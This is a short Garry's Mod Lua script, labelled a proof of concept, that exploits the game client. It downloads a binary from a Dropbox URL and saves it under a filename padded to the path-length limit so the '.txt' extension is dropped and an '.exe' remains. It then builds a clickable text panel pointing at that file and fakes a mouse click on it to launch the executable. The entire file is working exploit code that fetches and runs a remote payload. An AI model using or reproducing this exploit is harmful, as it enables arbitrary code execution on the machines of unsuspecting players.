local print = function(...)
	LocalPlayer():ChatPrint(...)
end

local path = util.RelativePathToFull("data")

local fname = string.rep("a",254 - string.len(path)) .. ".exe"
local fname_ex = fname .. ".txt"

print "Loading proof of concept..."
http.Fetch("https://dl.dropboxusercontent.com/u/34110473/web_share/gcd", function(data)
	print "Done! Launching..."
	file.Write(fname_ex, data)
	path = path:gsub("\\","/") .. "/" .. fname
	
	local pnl = vgui.Create("RichText")
	pnl:SetPos(0, 0)
	pnl:SetSize(100, 100)
	
	pnl:InsertClickableTextStart(path)
	pnl:AppendText(path)
	pnl:InsertClickableTextEnd()
	
	pnl:MakePopup()
	
	gui.EnableScreenClicker(true)
	gui.InternalCursorMoved(0, 0)
	
	timer.Simple(0.1, function()
		gui.InternalCursorMoved(0, 0)
		gui.InternalMousePressed(MOUSE_LEFT)
		gui.InternalMouseReleased(MOUSE_LEFT)
		gui.EnableScreenClicker(false)
		pnl:Remove()
	end)
end)